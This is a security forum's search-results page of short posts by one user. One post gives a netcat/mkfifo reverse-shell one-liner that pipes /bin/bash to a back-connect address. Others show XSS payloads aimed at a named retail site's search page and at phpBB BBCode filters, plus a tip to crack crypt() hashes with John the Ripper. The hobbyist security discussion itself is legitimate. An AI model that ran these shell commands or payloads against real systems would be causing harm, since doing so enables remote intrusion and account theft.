sla.ckers.org is
ha.ckers sla.cking

Current Page: 1 of 1
Results 1 - 26 of 26
4 years ago
chosi
Current Ubuntu's netcat does not come with an -e switch (i.e. executing commands directly from within netcat), so I saw this workaround, which might fit into this thread:

listening:
mkfifo mypipe;cat mypipe|/bin/bash|nc -l 6000 >mypipe;rm mypipe

connecting:
mkfifo mypipe;cat mypipe|/bin/bash|nc backconnect-address 12344 >mypipe;rm mypipe

(change backconnect-address and/or ports)

P.S.:
Forum: Obfuscation
4 years ago
chosi
ugh, congrats man.. and of course the bruteforce starts with A and ends with z :P
Forum: OMG Ponies
4 years ago
chosi
"mixed alpha" does not include weird letters like ö, does it? ;)
Forum: OMG Ponies
4 years ago
chosi
me too. seems like you have a typo in your challenge :P
Forum: OMG Ponies
4 years ago
chosi
....despite the fact, that you can just fake the referer ;)
Forum: CSRF and Session Info
4 years ago
chosi
The Session-ID is probably bound to the victim's IP address
Forum: XSS Info
4 years ago
chosi
err. there is no CNAME (anymore?). EDIT: nvm, I confused www.google-anon.com with google-anon.com ;)
Forum: Privacy
4 years ago
chosi
oh interesting. thanks for the answers! :)
Forum: XSS Info
5 years ago
chosi
Hi, are there any known test results on how browsers handle HTML tags after a closing </html>? I was just wondering how, for example, an <img> tag gets handled depending on the browser (and, if this is a serious criterion, the doctype). My quick answer would be "yeah, everything after a </html> tag gets rendered, evaluated and so on, completely disregarding the closing tag"
Forum: XSS Info
5 years ago
chosi
her texts should be on twitter *scnr*
Forum: OMG Ponies
5 years ago
chosi
...yes!
Forum: OMG Ponies
5 years ago
chosi
rvdh is right, it's most probably crypt(), like used in /etc/shadow. so I'd recommend john the ripper to crack it
Forum: SQL and Code Injection
5 years ago
chosi
PaPPy Wrote:
> ...
> i need some help with this one
> http://www.homedecorators.com/search.php?search=%22%3E%2526lt%26lt%3B%2Fa%26gt%3Bmarquee%3Etest&x=0&y=0

how about http://www.homedecorators.com/searchTips.php?search=%22%3E/onmouseover=alert(1)// - only an event handler though :)

Funny: NoScript s
Forum: Full Disclosure
5 years ago
chosi
digi7al64 Wrote:
> blackboard has so many xss (persistent and reflective) vulns in it its not funny. We spent an afternoon on it one day and came back with about 20 different versions in different spots.

yup. if you try three random parameters in an url, at least two of them are vulnerable. great for people new in xss: it's _bound_ to happen ;)
Forum: Full Disclosure
5 years ago
chosi
oh yeah right. thank you ;)
Forum: XSS Info
5 years ago
chosi
hello & merry christmas :) Usually when I find an xss vulnerability on a webpage, I send the guy/author an email like "oh, there's an xss-thingie on your site, please fix. see proof of concept (link) and consider escaping input from the web. of course this vulnerability might allow malicious guys to steal user accounts ..." BUT: I recently found an xss vulnerability on a w
Forum: XSS Info
5 years ago
chosi
That explains it all. :> I even managed to create an XHR with this limited charset.. Did you know that you don't need the "new" in r=new XMLHttpRequest()? :)
Forum: XSS Info
5 years ago
chosi
OK I got something! :) It works if we use this one: onload=document.location="javascript:alert%281%29// The HTML output would be: <img src="http://..mimetex.cgi?E<a href="http://onload=document.location=&quot;javascript&#058;alert%281%29//" ..> The colon is still filtered, but somehow Firefox doesn't mind it *now*, since we start with a double quot
Forum: XSS Info
5 years ago
chosi
Thanks Gareth, we're getting closer now: The first one is not "URLish" enough - we're inside a standard url-bbtag of phpBB here - so no newlines either (I meant whitespaces including newlines, tabs etc.). The second one doesn't match the URL regex as well; phpBB doesn't like backslashes nor single quotes. What I did find out: % does NOT get encoded (contrary to what I said above -
Forum: XSS Info
5 years ago
chosi
Thank you for finding this out! I didn't have the chance to take a look at the ACP of phpBB3 yet - so I'll talk to the guy with the LaTeX idea about this issue ;) Nevertheless: Any idea how to call functions like alert(1) without the use of parentheses AND whitespaces? I didn't get closer than these two: a setter=alert,a=1 -- Not allowed whitespace a=alert,a(1) -- Not allowed parenthesis
Forum: XSS Info
5 years ago
chosi
Okay I continued testing, also using your examples. Let me sum up what I found out:
- I cannot use parentheses ( and ); using %28 and %29 does not work either.
- No whitespaces
- Input has to look like a URL, checked against a RegEx
- The closing " after my payload causes JS errors. So I will end with //
- The img gets loaded so we, of course, use an onload event.
My conclusion is:
Forum: XSS Info
5 years ago
chosi
Ok, javascript: doesn't work, as there is a second whitelist check against allowed protocols. Don't know why phpBB checks twice :) So we're still looking for a character to separate html attributes (except whitespaces and a slash)
Forum: XSS Info
5 years ago
chosi
I *do* have problems exploiting this :> The problem is that phpBB's limits are quite hard to work with. We can start the content of [-tags only with lettersOnly]
Forum: XSS Info
5 years ago
chosi
Starting with a forward slash is not allowed (I suppose we have to match against a RegEx for URLs - will find out about that in the phpBB code as well). I will think about a possible circumvention later - after reading the mentioned topic. Thanks for your input - gonna check that out tomorrow :)
Forum: XSS Info
5 years ago
chosi
I got a little further: (again [-brackets are replaced) D(latex]E(url=http://example.org/?;onerror=window.location=//example.org/+//test.html]text(/url]B(/latex]C leads to: D<img src="http://mitaub.sourceforge.net/cgi-bin/mimetex.cgi?E<a href="http://example.org/?;onerror=window.location=//example.org/+//test.html" target="_blank" class="postlink"&
Forum: XSS Info
5 years ago
chosi
Hey, there's a feature in phpBB to create your own bbtags, which can lead to invalid html-code. Please note that I have replaced the character '[' by '(' to prevent *THIS* Forum from interpreting any BBCode ;) There's a quite common method to render LaTeX by inserting an img, e.g.: (LaTeX]{TEXT}(/LaTeX] is replaced with: <img src="http://mitaub.sourceforge.net/cgi-bin/mimet
Forum: XSS Info